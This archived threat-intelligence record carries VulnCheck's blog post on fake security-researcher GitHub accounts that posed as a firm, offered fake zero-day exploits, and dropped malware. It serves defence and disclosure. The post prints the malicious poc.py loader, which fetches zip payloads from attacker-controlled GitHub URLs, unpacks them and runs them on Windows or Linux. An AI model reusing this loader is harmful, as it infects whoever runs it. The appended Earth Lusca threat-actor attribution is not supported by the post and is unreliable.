{ "id": "a73fca74-f66f-429f-b97a-cd7a9a066605", "created_at": "2026-04-06T00:15:59.763857Z", "updated_at": "2026-04-10T03:36:48.21852Z", "deleted_at": null, "sha1_hash": "995f2a911d48787a23baccbd3704e01893cf2a83", "title": "Fake Security Researcher GitHub Repositories Deliver Malicious Implant Blog - VulnCheck | Blog | VulnCheck", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2175093, "plain_text": "Fake Security Researcher GitHub Repositories Deliver Malicious\r\nImplant Blog - VulnCheck | Blog | VulnCheck\r\nPublished: 2023-06-14 · Archived: 2026-04-05 20:28:02 UTC\r\nFake Security Researcher GitHub Repositories Deliver Malicious Implant\r\nIn early May, VulnCheck came across a malicious GitHub repository that claimed to be a Signal 0-day. The team\r\nreported the repository to GitHub, and it was quickly taken down. The same scenario continued throughout May.\r\nRecently, the individuals creating these repositories have put significant effort into making them look legitimate\r\nby creating a network of accounts and Twitter profiles, pretending to be part of a non-existent company called\r\nHigh Sierra Cyber Security, and even using headshots of legitimate security researchers from companies like\r\nRapid7.\r\nEach High Sierra Cyber Security account contains a malicious repository claiming to be an exploit for a well-known product, including Chrome, Exchange, Discord, and more. Some of the accounts even advertise their\r\n“findings” on Twitter.\r\nSecurity researchers should understand that they are useful targets for malicious actors and should be careful when\r\ndownloading code from GitHub. Always review the code you are executing, and don’t use anything you don’t\r\nunderstand.\r\nAs part of VulnCheck’s Exploit Intelligence offering, we monitor and review large amounts of GitHub\r\nrepositories. The review process exists to filter out useless, malicious, and/or scam repositories. In early May,\r\nduring routine reviews, we came across an obviously malicious GitHub repository that claimed to be a Signal 0-\r\nday. We reported the repository to GitHub, and it was quickly taken down.\r\nThe very next day, an almost identical repository was created under a different account, but this time claiming to\r\nbe a WhatsApp zero-day. Again, we worked with GitHub to get the repository taken down. This process kept\r\nrepeating itself throughout May.\r\nMore recently, however, the individual(s) creating these repositories have put more effort into making them look\r\nlegitimate by creating a network of accounts. The attacker has created half a dozen GitHub accounts and a handful\r\nof associated Twitter accounts. The accounts all pretend to be part of a non-existent security company called High\r\nSierra Cyber Security. Below is an example of one such account:\r\nhttps://vulncheck.com/blog/fake-repos-deliver-malicious-implant\r\nPage 1 of 6\n\nThe profile looks like a normal security researcher account. The account has a headshot, followers, an associated\r\norganization, a Twitter handle, and a (dead) link to the company’s website. However, we recognized “Andrei\r\nKuzman” was using a headshot of a Rapid7 employee. So it appears the attacker is not only making efforts to\r\nmake the profiles look legitimate, but also using headshots of actual security researchers.\r\nEach High Sierra Cyber Security account contains a malicious repository claiming to be an exploit for a well-known product: Chrome, Exchange, Discord, etc. Some of the accounts even advertise their “findings” on Twitter:\r\nhttps://vulncheck.com/blog/fake-repos-deliver-malicious-implant\r\nPage 2 of 6\n\nhttps://vulncheck.com/blog/fake-repos-deliver-malicious-implant\r\nPage 3 of 6\n\nThe repositories all follow a very simple formula. They all look like the following image (including tagging of\r\n“hot” CVE to attract victims):\r\npoc.py contains the code to download a malicious binary, and then execute it. The python script will download a\r\ndifferent payload depending on the victim’s host operating system. The above Discord “0-day” uses the following\r\ncode to perform these actions:\r\nif __name__ == '__main__':\r\n if os.name == 'nt':\r\n try:\r\n namezip = \"cveswindows.zip\"\r\n name = \"cveswindows\"\r\n url = \"https://github.com/GSandersonHSCS/discord-0-day-fix/raw/main/gitignore/cveswindows.zip\"\r\n des = os.path.join(os.environ['TMP'], namezip)\r\n if not os.path.exists(os.path.join(os.environ['TMP'], name, name + \".exe\")):\r\n urllib.request.urlretrieve(url, des)\r\n with open(des, 'wb') as f: f.write(urllib.request.urlopen(url).read())\r\n zf = ZipFile(des, 'r')\r\n zf.extractall(os.path.join(os.environ['TMP'], name))\r\n zf.close()\r\n pid = subprocess.Popen([os.path.join(os.environ['TMP'], name, name + \".exe\")], creationflags=0x0\r\n except:\r\n pass\r\n else:\r\n url = \"https://github.com/GSandersonHSCS/discord-0-day-fix/raw/main/gitignore/cveslinux.zip\"\r\n namezip = \"cveslinux.zip\"\r\n name = \"cveslinux\"\r\nhttps://vulncheck.com/blog/fake-repos-deliver-malicious-implant\r\nPage 4 of 6\n\ndes = os.path.join(\"/home/\" + os.environ[\"USERNAME\"] + \"/.local/share\", namezip)\r\n if not os.path.exists(os.path.join(\"/home/\" + os.environ[\"USERNAME\"] + \"/.local/share\", name, name)):\r\n urllib.request.urlretrieve(url, des)\r\n with open(des, 'wb') as f: f.write(urllib.request.urlopen(url).read())\r\n zf = ZipFile(des, 'r')\r\n zf.extractall(os.path.join(\"/home/\" + os.environ[\"USERNAME\"] + \"/.local/share\", name))\r\n zf.close()\r\n st = os.stat(os.path.join(\"/home/\" + os.environ[\"USERNAME\"] + \"/.local/share\", name, name))\r\n os.chmod(os.path.join(\"/home/\" + os.environ[\"USERNAME\"] + \"/.local/share\", name, name), st.st_mode\r\n subprocess.Popen([\"/bin/bash\", \"-c\", os.path.join(\"/home/\" + os.environ[\"USERNAME\"] + \"/.local/share\r\n main()\r\nAbove, poc.py downloads one of two zip files. cveslinux.zip or cveswindows.zip are fetched from GitHub,\r\nunzipped, written to disk, and executed. The Windows binary has a very high detection rate on VirusTotal (43/71).\r\nThe Linux binary much less so (3/62), but it contains some very obvious strings indicating its nature.\r\nThe attacker has made a lot of effort to create all these fake personas, only to deliver very obvious malware. It’s\r\nunclear if they have been successful, but given that they’ve continued to pursue this avenue of attacks, it seems\r\nthey believe they will be successful.\r\nIt isn’t clear if this is a single individual with too much time on their hands, or something more advanced like the\r\ncampaign uncovered by Google TAG in January 2021. Either way, security researchers should understand that\r\nthey are useful targets for malicious actors and should be careful when downloading code from GitHub. Always\r\nreview the code you are executing and don’t use anything you don’t understand.\r\nIf you have engaged with any of the following accounts, consider the possibility that you’ve been compromised.\r\n1. https://github.com/AKuzmanHSCS\r\n2. https://github.com/RShahHSCS\r\nhttps://vulncheck.com/blog/fake-repos-deliver-malicious-implant\r\nPage 5 of 6\n\n3. https://github.com/BAdithyaHSCS\r\n4. https://github.com/DLandonHSCS\r\n5. https://github.com/MHadzicHSCS\r\n6. https://github.com/GSandersonHSCS\r\n7. https://github.com/SSankkarHSCS\r\n1. https://github.com/AKuzmanHSCS/Microsoft-Exchange-RCE\r\n2. https://github.com/MHadzicHSCS/Chrome-0-day\r\n3. https://github.com/GSandersonHSCS/discord-0-day-fix\r\n4. https://github.com/BAdithyaHSCS/Exchange-0-Day\r\n5. https://github.com/RShahHSCS/Discord-0-Day-Exploit\r\n6. https://github.com/DLandonHSCS/Discord-RCE\r\n7. https://github.com/SSankkarHSCS/Chromium-0-Day\r\n1. https://twitter.com/AKuzmanHSCS\r\n2. https://twitter.com/DLandonHSCS\r\n3. https://twitter.com/GSandersonHSCS\r\n4. https://twitter.com/MHadzicHSCS\r\nSource: https://vulncheck.com/blog/fake-repos-deliver-malicious-implant\r\nhttps://vulncheck.com/blog/fake-repos-deliver-malicious-implant\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://vulncheck.com/blog/fake-repos-deliver-malicious-implant" ], "report_names": [ "fake-repos-deliver-malicious-implant" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434559, "ts_updated_at": 1775792208, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/995f2a911d48787a23baccbd3704e01893cf2a83.pdf", "text": "https://archive.orkl.eu/995f2a911d48787a23baccbd3704e01893cf2a83.txt", "img": "https://archive.orkl.eu/995f2a911d48787a23baccbd3704e01893cf2a83.jpg" } }